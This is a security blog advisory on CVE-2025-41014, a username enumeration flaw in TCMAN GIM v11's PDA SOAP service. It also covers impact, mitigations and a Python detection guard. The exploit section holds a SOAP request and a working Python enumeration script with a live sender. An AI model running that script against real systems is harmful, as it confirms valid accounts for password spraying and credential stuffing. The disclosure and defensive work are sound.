CVE-2025-41014: Exposing Usernames – Unauthenticated Enumeration in TCMAN GIM v11

Overview

CVE-2025-41014 describes a user enumeration vulnerability in TCMAN GIM v11, version 20250304, of the class CWE catalogues as Observable Response Discrepancy (CWE-204). An unauthenticated attacker can determine whether a given username exists on the system, because the /WS/PDAWebService.asmx endpoint answers differently for existing and non-existent accounts.

Technical Details

The vulnerability resides in the /WS/PDAWebService.asmx endpoint. A SOAP request whose SOAPAction header names the GetLastDatePasswordChange method, and whose body supplies a username in the pda:username parameter, receives a different response depending on whether that username exists. No authentication is required to call the method, so an attacker can confirm the existence of accounts one name at a time, or in bulk from a wordlist, with nothing more than network access to the endpoint.

Specifically, an attacker can craft a SOAP request similar to the following skeleton (an illustration; the exact SOAPAction value and method namespace should be taken from the service description the ASMX handler publishes at /WS/PDAWebService.asmx?WSDL):

POST /WS/PDAWebService.asmx HTTP/1.1
Host: target.com
Content-Type: text/xml; charset=utf-8
SOAPAction: "GetLastDatePasswordChange"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetLastDatePasswordChange xmlns="http://tempuri.org/">
      <pda:username>testuser</pda:username>
    </GetLastDatePasswordChange>
  </soap:Body>
</soap:Envelope>

If “testuser” exists, the service returns whatever the method normally returns for a valid account; for a non-existent name it returns something else, and any stable difference in status code, body, or response length is enough to act as an oracle. To confirm the oracle rather than chase noise, first send a long random username that cannot exist, twice, to establish a baseline and check that the response is deterministic, then compare each candidate against that baseline. Two details the skeleton above leaves open: ASMX services normally expect the SOAPAction value and the method namespace exactly as published in the WSDL, and the pda prefix on the username element must be bound with an xmlns:pda declaration to the namespace that WSDL declares, otherwise the envelope is not well-formed XML and is rejected before the method ever runs.
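The differential check described above, as an added example that is not code from the original post or from TCMAN. Everything not stated in the advisory is an assumption and is marked as such in the code: the pda prefix is bound to the ASMX default namespace http://tempuri.org/, the SOAPAction value is used exactly as the advisory names it, and the responses produced by fake_send are constructed to illustrate the two server behaviours, not captured from GIM. Only http_send touches the network, and it is for authorised testing; the rest runs offline.

```python
import re
import secrets
import urllib.error
import urllib.request
from xml.sax.saxutils import escape

ENDPOINT_PATH = "/WS/PDAWebService.asmx"
SOAP_ACTION = "GetLastDatePasswordChange"  # as named in the advisory; confirm against the WSDL
NAMESPACE = "http://tempuri.org/"           # ASSUMED: the ASMX default, not stated on the page

_DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}(?:T[\d:.]+)?")
_TAG_RE = re.compile(r"<([A-Za-z_][\w.:-]*)")


def build_envelope(username: str) -> bytes:
    """SOAP 1.1 body for GetLastDatePasswordChange. The pda prefix is bound
    here (assumed namespace) so the envelope is well-formed; escape() keeps a
    username containing < or & from breaking the XML."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soap:Body>"
        f'<GetLastDatePasswordChange xmlns="{NAMESPACE}" xmlns:pda="{NAMESPACE}">'
        f"<pda:username>{escape(username)}</pda:username>"
        "</GetLastDatePasswordChange>"
        "</soap:Body></soap:Envelope>"
    ).encode("utf-8")


def fingerprint(status: int, body: str) -> tuple:
    """Reduce a response to the features that can leak existence: status code,
    whether it is a SOAP Fault, the element names present, and the body with
    whitespace removed and dates masked, so two valid-user answers that differ
    only in the date still compare equal."""
    tags = tuple(sorted(set(_TAG_RE.findall(body))))
    is_fault = any(t.endswith("Fault") for t in tags)
    normalised = _DATE_RE.sub("<DATE>", re.sub(r"\s+", "", body))
    return (status, is_fault, tags, normalised)


def enumerate_users(candidates, send, baseline_name=None):
    """Differential enumeration. `send(username) -> (status, body)`.
    A random name that cannot exist gives the 'unknown user' baseline; it is
    sent twice to make sure the response is deterministic before anything is
    concluded. Every candidate whose fingerprint differs is reported."""
    baseline_name = baseline_name or "nx-" + secrets.token_hex(8)
    baseline = fingerprint(*send(baseline_name))
    if fingerprint(*send(baseline_name)) != baseline:
        raise RuntimeError("responses are not deterministic; no usable oracle")
    return [u for u in candidates if fingerprint(*send(u)) != baseline]


def http_send(host: str, username: str, scheme: str = "https", timeout: int = 10):
    """Live sender for authorised testing only; not exercised offline.
    ASMX reports SOAP Faults with HTTP 500, so an HTTPError is still data."""
    req = urllib.request.Request(
        f"{scheme}://{host}{ENDPOINT_PATH}",
        data=build_envelope(username),
        headers={"Content-Type": "text/xml; charset=utf-8",
                 "SOAPAction": f'"{SOAP_ACTION}"'},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# CONSTRUCTED stand-in for the two server behaviours the advisory describes;
# these bodies are illustrative, not captured TCMAN GIM output.
_KNOWN_USERS = {"alice": "2025-01-15T09:30:00", "bob": "2024-11-02T17:05:10"}


def fake_send(username: str):
    """Offline replacement for http_send: a result for known users, a SOAP
    Fault with HTTP 500 for anyone else."""
    env = ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
           "<soap:Body>{}</soap:Body></soap:Envelope>")
    if username in _KNOWN_USERS:
        return 200, env.format(
            '<GetLastDatePasswordChangeResponse xmlns="http://tempuri.org/">'
            f"<GetLastDatePasswordChangeResult>{_KNOWN_USERS[username]}</GetLastDatePasswordChangeResult>"
            "</GetLastDatePasswordChangeResponse>")
    return 500, env.format(
        "<soap:Fault><faultcode>soap:Server</faultcode>"
        "<faultstring>User not found</faultstring></soap:Fault>")


if __name__ == "__main__":
    print(enumerate_users(["alice", "carol", "bob", "dave"], fake_send))  # ['alice', 'bob']
```

To run it against a live, authorised target, pass `lambda u: http_send("target.com", u)` as `send`. Masking dates in the fingerprint matters: without it, two valid accounts with different password-change dates would look like two different response classes and the comparison against the baseline would still work, but any later clustering of results would not.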

CVSS Analysis

At the time of writing, no CVSS score or severity is listed for CVE-2025-41014 (both show as N/A); the official score, once assigned, should be taken from the CNA record or NVD. As a reference point, unauthenticated user enumeration is normally scored under CVSS v3.1 as network-reachable, low-complexity, requiring no privileges or user interaction, with a low confidentiality impact only (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, base score 5.3, Medium), so it sits well below vulnerabilities that grant access directly.

Whatever the eventual score, the practical impact is worth weighing (see below).

Possible Impact

User enumeration does not compromise a system by itself, but it removes the guesswork from the next step. With a confirmed list of valid accounts, an attacker can aim brute-force and credential-stuffing attempts at real users instead of wasting requests on names that do not exist, run password-spraying campaigns that stay under lockout thresholds, deliberately lock out known accounts as a denial of service, and address phishing to people who actually hold accounts on the system. In short, it lowers the cost of every attack that needs a username.

Mitigation or Patch Steps

The primary fix is to upgrade TCMAN GIM to a version that addresses this vulnerability; contact the vendor for the availability of a patch or updated version. Until one is applied, the following workarounds reduce exposure:

  • Restrict access: judging by its name, the endpoint serves handheld (PDA) clients, so where possible expose /WS/PDAWebService.asmx only to the networks those devices use, or require authentication in front of it (for example at a reverse proxy). Either removes the unauthenticated condition entirely.
  • Rate limiting: throttle requests to /WS/PDAWebService.asmx per source address. Counting distinct usernames per source within a time window is a better signal than raw request rate, because a legitimate client asks about one account while an enumerator cycles through a list.
  • Modify the application logic: make the response for an unknown username indistinguishable from the response for a known one in status code, body, size and, as far as practical, timing. For a method that returns per-user data, this generally means refusing to answer unauthenticated callers at all, since any genuine result is itself the distinguishing factor. This option requires careful code review and testing.
  • Web Application Firewall (WAF) rule: match on the SOAPAction header or the GetLastDatePasswordChange element in the request body, and alert or block when one source submits many different username values in a short period.

These workarounds are not substitutes for a proper patch and should be treated as temporary measures.
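The rate-limiting and WAF workarounds above, as an added example of the detection logic; it is not part of the original post or of TCMAN's product. Because the page gives no product source, it is written as a reverse-proxy or middleware hook in Python: the request shape (client address, SOAPAction header, raw body), the thresholds, and the traffic sample are all assumptions, and the sample is constructed rather than captured. The guard keys on the number of distinct usernames one client asks about inside a sliding window, which separates an enumerator from a device that repeatedly queries its own account.

```python
import re
import time
from collections import deque

ACTION = "GetLastDatePasswordChange"
# Matches <username>, <pda:username> or any other prefix on the element.
_USERNAME_RE = re.compile(r"<(?:\w+:)?username>(.*?)</(?:\w+:)?username>", re.S)


class EnumerationGuard:
    """Per-client sliding window over requests for the vulnerable action.

    Two limits: a plain request cap (throttle) and, the more useful one, a cap
    on DISTINCT usernames a client asks about in the window (block), because
    a real PDA client asks about one account while an enumerator walks a list.
    Thresholds are ASSUMED starting points, to be tuned on real traffic."""

    def __init__(self, window_s=60.0, max_requests=20, max_distinct_users=3):
        self.window_s = window_s
        self.max_requests = max_requests
        self.max_distinct_users = max_distinct_users
        self._events = {}  # client -> deque of (timestamp, username)

    def _window(self, client, now):
        q = self._events.setdefault(client, deque())
        while q and now - q[0][0] > self.window_s:
            q.popleft()
        return q

    def check(self, client_ip, soap_action, body, now=None):
        """Return 'allow', 'throttle' or 'block'. Requests for other actions
        pass through untouched. SOAPAction may be the bare method name or the
        namespace-qualified URI ASMX usually publishes; both are accepted."""
        if soap_action.strip().strip('"').rsplit("/", 1)[-1] != ACTION:
            return "allow"
        now = time.monotonic() if now is None else now
        m = _USERNAME_RE.search(body)
        username = m.group(1).strip().lower() if m else ""
        q = self._window(client_ip, now)
        q.append((now, username))
        if len({u for _, u in q}) > self.max_distinct_users:
            return "block"
        if len(q) > self.max_requests:
            return "throttle"
        return "allow"


def simulate(guard, events):
    """Run CONSTRUCTED (t, client_ip, soap_action, username) tuples through
    the guard and return the decision for each request in order."""
    body = ("<GetLastDatePasswordChange><pda:username>{}</pda:username>"
            "</GetLastDatePasswordChange>")
    return [guard.check(ip, action, body.format(u), now=t) for t, ip, action, u in events]


# Constructed traffic: a legitimate device re-asking about its own account,
# an enumerator cycling names, and an unrelated action that is ignored.
ACTION_BARE = '"GetLastDatePasswordChange"'
ACTION_URI = '"http://tempuri.org/GetLastDatePasswordChange"'
CONSTRUCTED_TRAFFIC = [
    (0.0, "10.0.0.5", ACTION_BARE, "alice"),
    (1.0, "10.0.0.5", ACTION_BARE, "alice"),
    (2.0, "10.0.0.9", ACTION_URI, "admin"),
    (2.1, "10.0.0.9", ACTION_URI, "administrator"),
    (2.2, "10.0.0.9", ACTION_URI, "root"),
    (2.3, "10.0.0.9", ACTION_URI, "jsmith"),   # fourth distinct name -> block
    (3.0, "10.0.0.9", '"Login"', "x"),         # different action -> allow
]

if __name__ == "__main__":
    print(simulate(EnumerationGuard(), CONSTRUCTED_TRAFFIC))
    # ['allow', 'allow', 'allow', 'allow', 'allow', 'block', 'allow']
```

In a deployment the same logic belongs in the WAF or reverse proxy in front of IIS, where the SOAPAction header and body are already available; keying on client address alone is weak against distributed sources, so a global distinct-username counter for the action is a sensible second signal.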

About the Author

Cybersecurity specialist and founder of Gowri Shankar Infosec, a professional blog dedicated to sharing actionable insights on cybersecurity, data protection, server administration, and compliance frameworks including SOC 2, PCI DSS, and GDPR.
